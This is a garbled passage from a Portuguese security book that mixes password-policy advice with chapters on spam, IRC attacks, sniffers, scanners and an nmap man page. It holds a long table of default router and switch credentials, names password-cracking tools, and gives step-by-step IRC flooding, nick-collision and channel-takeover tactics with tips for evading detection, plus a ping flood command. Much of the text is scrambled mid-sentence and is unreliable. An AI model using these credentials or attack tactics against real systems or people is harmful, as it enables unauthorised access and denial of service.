Agor é é igual a 10.000 senhas diferent não puder repetir os dígitos entes.

Se apossui a m a que você, pois últimamente o sistema não dei a repetir os números nas senhas e com certeza há mais de 5040 clientes no ban

ai testar senha por senha e testando 100 senhas por segundo vai demorar no máximo 100 segundos ou 1 min segundos para descobrir sua senha. Ou no caso das sen rca de 51 segundos.

ou quer mais?

tem uma senha de quatro dígitos e após digitá-las poderá sua conta. a

úmeros que existem são: 0,1,2,3,4,5,6,7,8,9 isso da o total úmeros.

a senha são de quatro dígitos, então

digito, 10 opções no 2º dig

a só calcular 10*10*10*10 quees que são possíveis. Ou se você temos, 10*9*8*7 que é igual a 5040 senhas difernalisarmos veremos que com certeza tem muita gente que

esma senhx

co. Um programinha que v

uto e 40 has sem repetir números vai demorar ceTa bom

s para resolver este problema bloqueiam sua conta ap entativa em que a senha é digitada erradamente, ma anco de dados, e em muitas outras aplicações como logon de rede ou ftp não fazem este bloqueio.

Os bancoós a terceira ts em seu computador os seus arquivos, b

Terrorismo Tecnológico Aprenda Para Sobreviver

191

Programas para descobrir senhas por tentativas têm de monte é só dar uma procu de busca. Este tipo de programa é chamado de “ uta”.

Acontece que ele possui uma tabela com varias senhas usadas

rasileiros

A maioria usa números de telefones, nomes de times de futebol, nome do processador da máquina, seu próprio nome ou

eguidas como 1234, wer,asdf...

a

rada na Internet em sitesdescobrir senha por força br

e vai testando uma por uma até conseguir resultado.

9.2 Senhas dos b

da mãe ou do cônjuge, ou números ou letras s1111, 142536, aaaa, q

Dic : Pense em um nome e em um número, como exemplo o usarei maça e o número 2003, ago mos ado será: m2a0ç0a3, duvido que um hacker por tentativa e ai conseguir descobrir isto. E lembr uanto maior for à mais difícil vai ficar. ó você usar aquele calculo que fize cê r.

uma10 teríamos no total uma possibilidade de nhas diferentes.

inistrador... (acho bom começarem a se isto)

enha - não u

do usuário (login)

nomeresult

ra va intercalar e o

erro v e-se qsenha

É s mos agora pouco e vovai ve

Se usássemos naquele caso ao invés de senha de 4 dígitos uma de 10.000.000.000 se

am usuário e senha padrão como Muitos administradores us

user user, adm admpreocupar mais com

9.3 S sar

• Mesmo nome

Terrorismo Tecnológico Aprenda Para Sobreviver

192

• Senha em branco "senha", "pass" ou "password"

usuários último nome do usuáesposa/marido, pais ou filhos

sobre si mesmo (placa do c ata de ascimento, telefone, CPF). omente números alavra contida em dicionár ndo ou

geiro ra com menos de 6 caract

riodicidade máxima: 6 meses

ver suspeita de amentore que um funcionário que saiba da senha for dido

do s as

• Palavras óbvias, comoa diversos• Mesma senha par

• Primeiro e rio • Nome da • Informação arro, d

n• S• P io se nacional

extran• Palav eres

9.4 Troca de senha

• Periodicidade ideal: 3 meses• Pe • Sempre que hou vaz • Semp

despe

9.5 Quebran enh

De Word Use o programa wfwcd.zip com (19,8k) De ZIP Use o programa zipcrack.zip com (12,3k) DE ARJ Use o programa brkarj10.zip com (13,1k)

Terrorismo Tecnológico Aprenda Para Sobreviver

193

9.6 Senhas padr

witches/Hubs vem com co e sen e ão conhecidas pelos invas xa e à

um que tenhas certas õe ção s as senhas padrão.

s quais são:

s e senhas principa

ão Muitos Routers/S ntas has padrãoestas às vezes s ores dei ndo a redmercê de qualquerentão é mudar toda

informaç s. A solu

Vejamo Tabela com username is: Type/vendor/notes/etc Username Password

3Com admin synnet 3Com read synnet 3Com write synnet 3Com monitor monitor3Com manager r manage3Com security security 3Com_Office_Connect_5x0_ISDN_Routers n/a PASSWORD 3comCellPlex7000 tech tech 3comCoreBuilder7000/6000/3500/2500 g debu synnet 3comCoreBuilder7000/6000/3500/2500 tech tech 3comHiPerARCv4.1.x adm <blank> 3ComLANplex2500 debug synnet 3ComLANplex2500 tech tech 3comLinkSwitch2000/2700 tech tech 3comSuperStackIISwitch 2200 debug3comSuperStackIISwitch 2700 tech

Terrorismo Tecnológico Aprenda Para Sobreviver

194

ACC(Ericsson) netman netman ADC_Kentrox_Pacesetter_Router n/a secret All_Zyxel_equipment n/a 1234 AT&T_3B2_firmware n/a mcp AXIS200/240[netcam] root pass Bay_routers Manager <blank> Bay_routers User <blank> Bay350T_Switch n/a NetICs BaySuperstackII security security BRASX/I01_(DataCom) n/a n letmeiBreezeCOM_adapters2.x(console_only) n/a laflaf BreezeCOM_adapters3.x(console_only) n/a Master BreezeCOM_adapters4.x(console_only) n/a Super Cayman_DSL n/a > <blankCrystalview_outsideview32 n/a crystal digiCorp_(viper?) n/a BRIDGE digiCorp_(viper?) n/a d passworDLink_hub/switches D-Link D-LinkFlowpoint_DSL_installed_by_Covad n/a assword pFlowpoint_DSL2000 admin admin Jetform_design Jetform n/a Lantronics_Terminal_server_port 7000 /a nLantronics_Terminal_server_port 7000 /a nLinksys_DSL n/a admin Livingston_IRX_router !root <blank> Livingston_officerouter !root <blank> Livingston_portmaster2/3 !root > <blankMicroplex_print_server root root

Terrorismo Tecnológico Aprenda Para Sobreviver

195

Motorola-Cablerouter cablecom router Netopia_7100 <blank> > <blankNetopia_9500 netopia netopia Orbitor_console n/a d passworOrbitor_console n/a BRIDGE Osicom(Datacom) sysadm sysadm Shiva root <blank> Shiva Guest <blank> SpeedstreamDSL(Efficient) n/a admin UClinux_for_UCsimm root uClinux Webramp wradmin trancell Alteon ACEswitch 180e (web) admin admin Alteon ACEswitch 180e (telnet) admin <blank> NETPrint ( n/a sysadm all) Xylan Omniswitch admin switch Xylan Omniswitch diag switch Acce ratedDSL CPE and DSLAM sysadm anicust leArrowpoint admin system Cabletron (routers & switches) <blank> <blank> Adtran MX2800 n/a adtran Raidzone raid arrays n/a raidzone CableTron Netgear modem/router and SSR netman <blank> Ascend Pipeline/MAX user n/a Compaq Netelligent n/a superuser Develon Orbitor n/a bridge shiva VPN Gateway n/a shiva/isolation Dlink ISDN routers n/a 1234

Terrorismo Tecnológico Aprenda Para Sobreviver

196

Needed

SMC Accton

Contributed by:

Stephen Friedl <[email protected]> Sebastian Andersson <bof diegeekdie.com> h@Jonathan Leto <[email protected]> [email protected] Mike Blomgren <mik [email protected]> e.Knud Erik Højgaard <[email protected]> [email protected] Roelof Temmingh <roe [email protected]> loAxel Dunkel <[email protected]> Math s Bogaert" <[email protected]> iaextracts from "Hacking Exposed" Jonathan Leto <[email protected]> Chri wen <[email protected]> s OJim Wildman <[email protected]> Santiago Zapata <[email protected]> Brian S. DuRoss <[email protected]> Eric Knight <[email protected]> Max Vision [email protected]

Terrorismo Tecnológico Aprenda Para Sobreviver

197

Lou Albano mist [email protected] Mike Ireton [email protected] bacano [email protected] Karl Greenwood [email protected] LBE

ast Updated on Wed Jul 12 00:42:05 SAST 2000 y Roelof Temmingh mail: [email protected]

I put the stuff on here just the way I receive it..its not verified! Lembre-se Arquivos, programas, vírus, trojans, podem ser escondidos

arquivos dentro de fotos como em arquivos.gif como é o caso em que o programa Hide and Seek v. 4.1 pode mesclar os dois arq

uivos. E um programa espião pode ser instalado para copiar as suas senhas.

Terrorismo Tecnológico Aprenda Para Sobreviver

198

Capítulo X

Spam – A praga

Terrorismo Tecnológico Aprenda Para Sobreviver

199

10.1 Spam – A praga no e-mail

alma, não é um novo tipo de vírus, Spam na verdade são mensagens mandadas em série, isto é são aqueles e-mails que o pe

ue aumente cada vez mais.

á também sites que após um cadastro, ficam mandando noticias, previsões de tempo, anúncios de compra e venda entre outros. Até parece interessante durante alguns dias, mas logo você não vai mais ter interesse e só servirá para lotar sua caixa de e-mails.

problema é bem mais grave do que se pensa, já que junto ao e-mail poderá vir um vírus ou um trojan. Uma vez aberto este e-mail o computador estará infectado. Então desde já instale um bom antivírus que proteja não só a máquina, mas que também cheque todos os e-mails recebidos e enviados.

ara parar de receber as correspondências de Spam, você pode bloquear os e-mails, estes podem ser a partir de determinados conteúdos ou de um determinado usuário. Para bloquear você pode utilizar uma opção no Outlook ou no software que você utiliza para ver as suas correspondências (geralmente todos softwares de e-mail possuem está função). Ou então pela própria página prestadora de serviços de e-mail como o BOL, Globo.com, Hotmail, UOL etc.

10.2 E-Mail Bomba

C

ntelho de um amigo seu fica te repassando, como piadas, mensagens, textos... Em 2003 estimasse que 70% do trafego de e-mail seja spam e a previsão é q

H

O

P

Terrorismo Tecnológico Aprenda Para Sobreviver

200

Às vezes até serviço dos para este: o e-mail bomba consiste no envio de muitos e-mails em um tempo muito rápido, (ou pode ser um e-mail que se reproduz au

s de Spam são utiliza

tomaticamente), assim quando o usuário o abrir ele irá se multiplicar, a memória do computador provavelmente vai ficar superlotada e a máquina vai travar.

Não há muito que fazer neste caso a não ser usar o antivírus para a proteção, e se o sistema travar só resta mesmo reiniciá-lo e após isso tentar apagar este e-mail.

Terrorismo Tecnológico Aprenda Para Sobreviver

201

Capítulo XI

IRC – Não pense que não é importante aprender sobre Chats,

pois na verdade é muito importante, já que muitos usuários os usam escondido e o tempo todo!

Terrorismo Tecnológico Aprenda Para Sobreviver

202

11.1 Introdução

Neste momento é claro que você está se perguntando, o que

tem a ver o IRC, com segurança para aeronáutica, bancos, sua empresa... e até na sua casa!

Simples, muitos usuários acabam que ao invés de trabalhar ficam teclando, ou o Administrador ao invés de cuidar da rede fica papeando em salas de Chat. Então estou disponibilizando um manual do IRC. Para que vocês possam saber o que é possível

com este serviço.

Essa é uma antiga, elegante e efetiva maneira de paz com que a vítima mande muita informação para um servidor, que a

IRC client dele tenta processar essa informação, manda muitos dados para o servidor, que então vai

Existem muitos tipos de floods, mas escolher o melhor provavelmente trará omo os DCC e CTCP. Já os: Text, Notice, Invite floods, Crap floods não funcionam mesmo, ele te mostra à informação que derrubou o clie

d diferentes. São eles: DCC Chat flood, que manda

fazer

11.2 Flood

desconecta. Para tal são necessários clones. Clones são outras conexões com o servidor. Cópias do seu IRC client. O flood script, manda os clones enviarem muita informação simultaneamente para a pessoa. Quando o

desconectá-lo.

um resultado mais rápido c

nte, mas na verdade não fez foi nada. Outro fator importante é números de clones que você vai usar. Para dar flood em uma única pessoa, a melhor aposta que você pode fazer são três clones CTCP em floods como Clientinfo, Userinfo ou Version. ECHO floods são extremamente poderosos, porém requerem mais clones. DCC floods são muito efetivos também. Existem 4 tipos de DCC floo

Terrorismo Tecnológico Aprenda Para Sobreviver

203

mm

ilhares de janelas de DCC chat para a pessoa; DCC send flood, anda milhares de DCC send (Se os DCCs forem aceitos

automaticamente pode-se encher o HD de arquivos desagradáveis ou até fazer o micro trava ria do computador vai lotar. DCC Resume e Accept são outros dois tipos. Esses últimos foram a melhor forma de flood encontrada, mas IRC clients não os suportam mais, tornando eles fúteis.

da pessoa, mas a maioria não sabe sob

acontece quando você põe um bot dentro do splited Server, com o ck da pessoa que você quer matar. No netmerge, as duas

morrem. Esse método não funciona na undernet. O outro método é

r já que a memó

Quando usar clones ou fazer floods deve-se ter cuidado para não ser pego. Isso acarretaria em um K-line. Para prevenir que isso aconteça, lembre: Não use clones se não for absolutamente necessário. Destrua seus clones quando o objetivo for alcançado! Use "nick changing" clones pra dar flood. Todos sabem sobre o /whois para ver informações

re o /whowas. Assim, se o clone mudar de nome depois do flood, a vítima nunca vai saber quem o fez. NUNCA dê floods em canais com IRCops ou Network admins! Isso, certamente, vai lhe custará um K-line. Se for possível, faça o flood junto de um amigo, quanto menos clones por IP menor a chance de você ser pego.

Lembre-se que quanto mais rápida for sua conexão melhores resultados você terá, então é muito difícil derrubar alguém se esta conectado por linha discada e a vítima estiver por uma conexão de banda larga. E muitos usuários atacando uma única vítima também conseguira melhores resultados.

11.3 Colisão de Nicks

A colisão de Nicks ocorre quando duas pessoas estão usando o mesmo nick. Como os servidores não podem suportar isso, as pessoas são desconectadas. Existem dois tipos de colisão de Nicks. A colisão por split server e a por lag. A por split Server

ni

Terrorismo Tecnológico Aprenda Para Sobreviver

204

chamado de colisão r feito quando a pessoa muda de nick. O que acontece é isso: Primeiro lammer muda de nick. Segundo o script vê e manda um sinal para o bot qu

Tomar canais é u seu poder ou se vingar de um inimigo. É o motivo básico das guerras de IRC, on role de território. Essa seção contém informações úteis para

P. Contudo se seu não cair temos um dilema. Um canal sem OP e com duas pessoas o querendo. O que você faz? Corra para um netsplit!

por lag. Esse só pode se

e está no servidor laged e esse muda o seu nick para o novo nick da vítima. Terceiro em uns poucos segundos de lag o servidor em que o bot está dá um kill na outra pessoa, porque acha que o seu bot pegou o nick primeiro. Esse não é um bom método para um takeover, mas é divertido ver um bando de gente recebendo kill num grande canal.

11.4 Tomando Canais

ma boa maneira de mostrar

c tfazê-lo de várias maneiras.

11.5 Flood no Canal

Esse método é divertido, mas a parte mais difícil é que cada vez mais pessoas estão ficando imunes ao flood. Conseguindo dar flood em todas as pessoas o resto é fácil. Pegue todos os clones que você usou e descarte-os. Depois entre no canal e pegue O

Terrorismo Tecnológico Aprenda Para Sobreviver

205

u ar as banlists, as esvazie e mude os modos do canal. Isso almente acaba com os servidores que já estão mal. Eles ficam

ocar o canal nos modos normais, isso causa um lag terrível que leva o ca ém com os bots que não estão splited. Is rash. Se você não pode hackear os OPs pelo menos tem a sua vingança. Essa bri

11.6 Netsplit

Um canal sem OP é um alvo fácil para um netsplit. O que você faz é o seguinte: Quando achar um servidor splited conecte-se a ele. Se não houver ninguém no canal você ganha OP só entrando no canal. Com o OP, basta esperar por um netmerge e quando todos estiverem no canal novamente você vai ser o único OP, podendo fazer o que quiser!

Fazer isso com um canal que já tem OPs não é fácil. Na Undernet é impossível. Mas isso não quer dizer que você não possa se divertir. Pegue o OP e espere um netmerge. Quando as pessoas voltarem ao canal, rode um desync. O que ele faz, é m dretentando col

nal à ruína. Isso acaba tambso pode causá-los flood ou c

ncadeira pode levar o canal a ficar mal por uma meia hora algumas vezes.

Se você é sortudo o suficiente para estar numa rede lammer que ainda não tem proteção anti-nethack, você poderá tomar canais com netsplit, bastando ter o script certo. Primeiro - você precisa de um servidor splitado sem proteção. O que acontece é que quando o servidor quiser dar OP para alguém ele vai, na verdade, deOPar essa pessoa. Segundo - outro boa maneira de fazer isso é tendo como dar um kickban em cada pessoa que entrar no canal por um netmerge. Isso combinado com o netsplit protection fará você tomar o canal depois de uma simples batalha.

Terrorismo Tecnológico Aprenda Para Sobreviver

206

11.7 Pedindo ao OP

cê deOPar todos eles. Os C ps não podem fazer nada contra isso. A melhor maneira de

anhar OP é ficar n o depois peça para s entra no canal faz tempo e quer ajudar manter a ordem... Depois o script cuida de deOpar todos em massa, isso é f cil. O que o script vai fazer é ób

de guerra estão ficando cada vez mais avançados. ontudo, os servidores e os IRCops também estão ficando cada

vez melhores. Muitos servidores incorporam o Clone Detection. Isso significa listar as pessoas comparando os IP's e notificando os IRCops. Isso pode tornar impossível fazer um número de clones suf ientes para dar um flood em alguém. Alguns servidores têm proteção contra táticas de netsplit takeover. Esse tipo de coisa pode deter o hacking contra OPs durante um netsplit, permitindo somente tomar canais que não tenham OP. Anti Collide é também usado em muitos servidores. Fazendo com que os dois usuários sej m mortos numa colisão por troca de nick.

Essa é a maneira mais fácil de tomar um canal. É efetiva e legal, os significa te darem OP e voIR og um canal um pouco, sendo amável e prestativ

e ele pode te OPar? Diga que já

ávio: logo quando você ganhar o OP ele vai tirar o OP de todos

os outros, com exceção de você. Eles nem vão ter tempo de reagir! Depois de estar sozinho como OP do canal você poderá fazer o que quiser, trancar o canal, kickar e/ou banir todo mundo, tudo que der na telha. O canal é seu agora!

11.8 Guerra Avançada

Os scriptsC

ic

a

Terrorismo Tecnológico Aprenda Para Sobreviver

207

11.9 Nuke

Nuke é uma grande arma para tirar alguém de IRC rápido! Funci nuke manda informação para p a por eles, causará erros como "dead Socket", "connection refused", "eof from client" e "machine is not on the network".

Para usar o nuke é preciso primeiro um modem rápido 28.8, ou melhor. Você também precisa do Trumpet© Winsock. Programa dial up que se comunica rapidamente com o modem. Esse programa pode ser facilmente encontrado na web. Agora só é preciso de um programa de Nuke. Eu recomendo o Winuke 4 by CHAOS INC. ou Wnewk para máquinas Windows, ou se você usa um mac, MAC NUKE. Depois de pegar esses programas, é fácil tomar canais, e matar nicks rapidamente.

11.10 Bombas ICMP

ICMP é uma maneira extremamente poderosa de tirar a pessoa, não só de IRC, mas de sua conexão com a Internet. Funciona dessa maneira: ela manda mensagens ICMP, em uma taxa muito alta de velocidade, causando barulho na linha, e modem lag. Causa tanto lag, que seu ping aumenta terrivelmente e o joga pra fora do IRC server.

Para usar o ICMP você precisa de um Unix Shell account. Por que? Porque para usar o ICMP efetivamente você precisa de mais do que um modem pode oferecer. Você precisa de uma T1, pelo menos. Existem muitos programas de ICMP para Windows disponíveis, mas eles não trabalham muito bem. É a velocidade que importa nessa hora.

Aqui estão duas formas de usar ICMP num Unix shell: Ping -s (ip address) (packet size) (# of packets)

ona assim: O programa deessoa no servidor e ela é ferrad

Terrorismo Tecnológico Aprenda Para Sobreviver

208

Ping -s (packet size(ip address) (IP address) é o *!*@seja.la.oque.for (packet size)

é o tamanho de cada pacote a mandar, tente 30kb (# of packets) é q

ara juntos combinarem seus clones. Existem vantagens e desvantagens dos dois. As vantagens dos botnets é que estão sempre online por as desvantagens é que não s icos quanto uns clones oodnet.

) -c (# of packets) <-f>

uantos pacotes mandar 3000 é um bom número -f é opcional em segundo, e manda pacotes a 20/seg.

11.11 Botnet/Floodnet

É cada vez mais difícil usar clones sem ser pego. Você precisa de uma maneira de usar o flood sem ser detectado. Como fazer isso? Floodnet. Existem dois tipos diferentes de Floodnet. O primeiro é com Eggdrop bots, esses botnets são compreendidos como eggdrops ligados, e tem um script de flood comum. Existem botnets com muitas centenas de ligações. É muito difícil parar o flood deles. A outra maneira, é usar scripts individuais. Os scripts têm comandos comuns, e permitem que usuários com o mesmo script de se liguem, p

que estão em um Shell. Masão tão dinâm

fl

Terrorismo Tecnológico Aprenda Para Sobreviver

209

Capítulo XII

Sniffers – Os farejadores da Net

Terrorismo Tecnológico Aprenda Para Sobreviver

210

12.1 Introdução

Os sniffers (farejadores), funcionam mais ou menos como um cão

ões transmitidas pelos protocolos, podendo então capturar conversas, textos, mensagens e qualquer outra coisa que esteja trafegando pela rede. Nada que seja entrada e saída de dados escapará ileso, ele abre os pacotes e os salva como do depois como um documento.txt. Copia mesmo sendo em um servidor de ftp, chats, aplicativos, editores

farejador que fica espionando todas as informações que passam por ele. Podendo fazer parte de um Trojan (cavalo de tróia). Depois de instalado um Sniffer captura tudo o que trafega pela rede e o que é feito localmente (no computador onde ele reside). Na verdade ele não passa de um espião, copiando tudo o que passa por ali sendo o que entra por dispositivos de input, ou seja, o teclado, e algumas versões copiam as informaç

um texto podendo ser li

de texto, enfim tudo o que for feito vai sendo salvo. Existem sniffers para Unix, Linus, Windows... enfim para todas as plataformas.

Na pratica.

Terrorismo Tecnológico Aprenda Para Sobreviver

211

(Sniffer IRIS versão 3.6)

12.2 Filtrando pacotes na rede

É claro que para capturar os pacotes da rede o sniffer tem que

ter acesso a eles. Em uma rede ponto a ponto, onde não se tem um servidor todos recebem os protocolos em qualquer máquina o programa ira pegar as informações, porém em uma rede com servidor e sub-redes não. Em uma super rede o sniffer para capturar os pacotes tem que estar instalado no servidor, obrigando o hacker a invadir o servidor e instalar o programa lá dentro. No caso da Internet, o sniffer teria que ser instalado na máquina do provedor e somente irá capturar as informações de quem estiver conectado por este provedor. Geralmente em provedores a idéia é capturar logins e senhas para conexão e informações sobre os usuários. Mas em

Terrorismo Tecnológico Aprenda Para Sobreviver

212

empresas pode-se pegar informações, documentos, e tudo mais que estiver trafegando pela rede, ou localmente no caso de estar ins se passa pela máquina.

banco poderia copiar todas as informações de um cliente inclusive sobre sua conta e a senha.

Existem algumas opções no Sniffer que possibilita filtrar os tipos

de pacotes a serem salvos. Vamos supor que queira descobrir todas as senhas que comecem com a letra “M”. Após configurar o sniffer e esperar, ele começa a me enviar os pacotes recebidos já “selecionados” começando com a letra “M”, estes podem ser enviados para você via e-mail. Existem muitos desses spys pela Internet que podem ser pegos gratuitamente, e tem muitos administradores, chefes ou até um “amigo” que instalam esses aplicativos para vigiar os seus funcionários e conhecidos, e em alguns casos até os expondo ao ridículo já que assim poderão ler seus e-mails e até dizer para alguém que tipo de mensagem você vê.

12.4 Roteadores

Alguns sniffers conseguem obter dados direto do roteador. O que quer dizer que no modelo OSI ele consegue ler as informações contidas na camada 3. Então mesmo que seja instalada uma proteção no sistema operacional, como um anti-sniffer ou um antivírus que possua uma boa proteção não adiantaria de nada se o sniffer estiver pegando os dados diretamente roteadores. Este que ao rotear as informações geram uma copia e as envia ao espião.

talado para pegar somente o queÉ bem perigoso, pois em um

12.3 Capturando senhas

Terrorismo Tecnológico Aprenda Para Sobreviver

213

Para se defender d dministrador tiver a consciência de não deixar o roteador mofando e aplicar as cor

12.5 Anti-Sniffers

São programas q e ninguém esta copiando suas informações e retransmitindo para alguém.

sor, ele envia vários con

elhor!)

isto somente se o a

reções necessárias para atualizar o próprio roteador. O ideal seria procurar a página do fabricante e verificar se existe alguma dica ou informação sobre o assunto. E Torcer para que o Fabricante se preocupe com isto! Por isso na hora de comprar um root tome cuidado. Já dizia minha avó que o barato sai caro!

ue ficam monitorando para ver s

Há bons e péssimos anti-sniffers, uns não conseguem monitorar direitos e outros acabam deixando o seu sistema lento.

Os melhores são os que enganam o invateúdos falsos para o hacker e este vai imaginando que está

obtendo sucesso, quando na verdade esta só recebendo informações erradas.

Uma boa idéia é usar um Honeypot com um anti-sniffer.

(Bons Sniffers)

• DNMENG • ICMP DATA SNIFFER • LANGUARD • SHOMITI • IRIS (provavelmente o m

Terrorismo Tecnológico Aprenda Para Sobreviver

214

Capítulo XIII

Scanners - Verdadeiros Robôs em busca de brechas!

Terrorismo Tecnológico Aprenda Para Sobreviver

215

13.1 Introdução Todos aplicativos que são lançados para a venda, de qualquer

empresa, chega ao usuário com muitos Bugs. Esses podem vir a ser uma ameaça à segurança se não forem localizados e corrigidos. Então para analisar e testar todos os aplicativos e o próprio sistema operacional é que se tem o scanner, ele procura erros. Muitos ha

exposto a ata

13.2 Falhas em um host Usamos então o scanner para detectar as falhas, ele testará

cada porta e seu serviço em busca de erros do aplicativo ou erros qu

erta e que esta sendo usada pelo sistema, como a porta 80 (www).

lo mudando sua estrutura, as informações contidas... Internet Information Server e o Apache, por serem os mais

conhecidos são também um dos que mais possuem falhas conhecidas como a de deixar o invasor entrar na rede ou gerar um Buffer Overflow que faz com que a memória do servidor seja toda consumida, travando o sistema.

ckers também o utilizam, pois assim ficam sabendo onde o sistema está vulnerável, ficando assim facilmente

ques.

e o administrador cometeu ao configurá-lo. Tentando proteger o seu sistema, atualmente usa-se um firewall,

este apenas deixa habilitada determinada porta do computador, bloqueando as outras para que não seja atacado, porém o ataque pode ser feito pela torta que ficou ab

Servidores World Wide Web, são os que guardam as home pages para que qualquer um com um computador possa acessá-las, mas esses servidores possuem inúmeras falhas que podem ser usadas para invadir, podendo então tirar o site do ar, ou mesmo desarrumá-

Terrorismo Tecnológico Aprenda Para Sobreviver

216

Mas não é só a www, são todas as portas e serviços que possuem os erros.

13.3 Portas e Serviços Ativos O total de portas em um computador é de 65535, sendo elas

TCP e UDP. Cada uma executa um determinado serviço, uns exemplos são:

Nº da porta – Serviços: 21 - FTP (File Transfer Protocol) 235 - SMTP (Simple Mail Transfer Protocol)

WWW

a aplicação que iremos utilizar, quando fize ma porta. Sendo alg mo a do ICQ ele pe a e a usa na próxima vez rá outra porta disponível, est é elas não executam ne .

e verificar quais dessas est Shadow Scan. Testará as 65 o qual porta e serviço estão sendo utilizados.

- TELNET 279 - FINGER 80 - Qualquer que sejamos algo em uma rede ou na Internet usamos uumas delas que sempre mudam de serviço coga uma porta que não está sendo utilizad que você conectar na Internet ele pegaas são as portas randômicas, isto cessariamente a mesma aplicação sempreUm scanner de Portas faz o trabalho dão ativas, um bom scan é o Haktek e o 535 uma por uma e retornará mostrand

Terrorismo Tecnológico Aprenda Para Sobreviver

217

Podemos até mesmo passar o scan na nossa rede ou no nosso computador para saber quais portas estão abertas, e digamos que ele nos informe que: 80 e a 12345 estão ativas.

A 80 é a de www A 12345 é a do Net Bus EPA! Netbus é um trojan, isto quer dizer que ele esta instalado e

ativo. Pronto agora sabemos que a rede está infectada. E é assim mesmo que um invasor faz, vai scanneando pela

Internet até achar

ub-redes, essas são pequenas redes que compartilham o mesmo servidor. Novamente os Shadow Scan, o Haktek lideram sendo os melhores para descobrir quem são ntão quais são os hosts ativos e o seu DNS (nome).

os que um hacker queira os hosts da empresa ATACADA (não sei se essa empresa existe só peguei um nome como exemplo)

alguém que já esteja contaminado.

13.4 Máquinas ativas da subnet Um servidor possivelmente possui algumas s

essas máquinas. Ele descobre e

Digam

Primeiro é só abrir uma janela do DOS e digitar ping mais o endereço.

Terrorismo Tecnológico Aprenda Para Sobreviver

218

Após dar enter ele retorna mostrando que o IP é 200.200.200.200

Agora com o scanner coloca-se o IP e pede para que ele localize

os hosts. E nos retorna que: 200.200.200.125 - internet.atacada.com.br 200.200.200.30 - campus.atacada.com.br 200.200.200.15 - route.atacada.com.br 00.200.200.09 - diretor.atacada.com.br

00.54 - server.atacada.com.br 200.200.200.79

00.200.200.55 - ftp.atacada.com.br

2200.200.2

- fabio.atacada.com.br ail.atacada.com.br 200.200.200.189 - em

2

Terrorismo Tecnológico Aprenda Para Sobreviver

219

Digamos que anteriormente o hacker não havia conseguido invadir o servidor, pois este estava bem protegido, mas agora ele po

bios

O netbios não é u função dele é de prover a comunicação de uma r de. Como não da para rotea-lo, necessariamente todas as máquinas ligadas por ele tem que estar

O bom mesmo é não usar o netbios, mas se precisar faça o

- Se o computador não pertencer a nenhuma rede ou não

- Se usar Linux e Windows cuidado com o Samba

de atacar uma sub máquina e pegar as informações! Ou até mesmo instalar um sniffer no roteador já que agora ele

sabe que este está na 200.200.200.15 - route.atacada.com.br Ou instalar um sniffer em uma máquina qualquer e começar a

recolher dados que estão passando pela rede.

13.5 Scanneando o net

m protocolo roteavel. E a e

na mesma sub rede. Se scanneado e invadido será possível mapear drives de todos os outros micros ligados a ele.

13.6 Como Evitar então?

seguinte:

precisar compartilhar arquivos pela Internet, desabilite as opções “Compartilhar arquivos e impressoras”

- Coloque senhas para acesso. - Corrija todos os Bugs do sistema.

Terrorismo Tecnológico Aprenda Para Sobreviver

220

E por fim passe um bom scanner como o NAT (Netbios Auditing Tool) para ver se ainda possui alguma falha.

13.7 HTTP e FTP

mas e falhas ativos, as nas

an. muito

ui uma uito grande em relação aos outros protocolos.

or ser tão complicado ele acaba possuindo muitos erros, mas são as vezes

á um

lista de mas a serem scanneados, então

ue um novo erro é encontrado o scan fica sabendo através tualizações.

é este se for

Tanto quanto o HTTP e FTP podem ser scanneados por um scan de vulnerabilidade, este pode encontrar erros em sisteainda vir com um guia ensinando como utilizar as encontradas. Alguns scanners podem descobrir os hosts analisar as portas e analisar as vulnerabilidades encontradportas.

Os melhore são: Security Shadow Scan, Simpsons, Stealth ScOs dois protocolos possuem inúmeras falhas, porém o ftp é

interessante por ser um dos protocolos existente que posscomplexibilidade mPum pouco mais difíceis de serem encontrados e algumsendo um pouco complicado utilizar essas falhas, por isso hcapítulo a respeito do FTP.

Muitos desses scans possuemrros a serem procurados nos siste

up-date atualizando sua esempre qe suas ad

13.8 Analisando Firewalls Os firewalls são alvo de muitos testes, pois como

aplicativo que tenta proteger o sistema, sendo que,

Terrorismo Tecnológico Aprenda Para Sobreviver

221

descobertos falhas de proteção e implementação será fácil derrubar

os de uais ele

neira m os pacotes poderá ver como o firewall está

a onde está enviando estes pacotes. Isto acontece m administradores que não fazem atualizações.

em es.

ele tem como rviços estão

/

toda uma rede. A maior parte dos scanners para firewall envia vários tip

pacotes de informações para ver quais o firewall barra e qr por sua barreira, assim ao ser descoberta a mapermite passa

ele lidar codtrabalhando e par

mente coprincipalCom certas informações fica fácil saber qual o tipo de invasãoque o hacker deverá trabalhar para conseguir resultados eficient

Shadow Scan é um bom scan para firewalls.

13.9 Scan em Linux

nmap é uma ótima ferramenta para scannear redes, Ofunção ver os computadores que estão ativos e quais sesendo fornecidos.

mapUma versão pode ser obtida em http://www.insecure.org/n e como a versão é aberta o código pode ser obtido em: ftp://ftp.ee.lbl.gov/libpcap.tar.z

difEste é um software livre e pode ser copiado distribuído, mo icado Pública

por bem

igas do vavam

uitas ar.

enfim pode ser feito tudo dentro dos termos de Licença Geral GNU como publicado pelo Free Software Foundation; Hackers em geral como gostam muito de usar os Linux acabam

itausar esta ferramenta, pois o Nmap faz uma topologia mufeita e demonstrada da rede que ele irá atacar. Versões antsoftware, anteriores a versão 2.0, são bem ruins já que ou trao micro do hacker ou davam uma pane em algum nó da rede m

dovezes chegando a tirar a rede que estava sendo scanneada

Terrorismo Tecnológico Aprenda Para Sobreviver

222

(As informações foram tiradas do próprio site da NMAP) (Nmap network security scanner man page)

Tradução: Antônio Pires de Castro Jr -sT T CP connect() scan: Esta é a mais básica forma de

" scanning, porque não abre uma conexão

YN

ag YN/ACK é recebido, o flag RST é imediatamente viado para encerrar a conexão (atualmente o

TCP scanning. A chamada de sistema, connect(), provida pelo seu sistema operacional é usada para abrir uma conexão para toda porta interessante na máquina. Se a porta está no estado listening, con nect() irá ter sucesso, por outro lado a porta não será alcançada. Uma grande vantagem desta técnica é que você não precisa de nenhum privilégio especial. Qualquer usuário em UNIX está livre para usar esta chamada. Este tipo de scan é facilmente detectável pelo log do host alvo, o qual mostrará o grupo de conexões e mensagens de erro para os serviços os quais

somente para tê-la aceitam, accept(), a conexão imediatamente desligada. -sS

scan: Esta técnica é muito conhecida como TCP SYN "half-open TCP completa. É enviado um pacote com o flag S setado, como se fosse abrir uma conexão real e é esperado pela resposta. Uma resposta SYN/ACK indica que a porta está no estado listening. O flag RST é uma indicação de estado não listening. Se o fl S en

Terrorismo Tecnológico Aprenda Para Sobreviver

223

núcleo do SO faz isso por nós). A principal vantagem

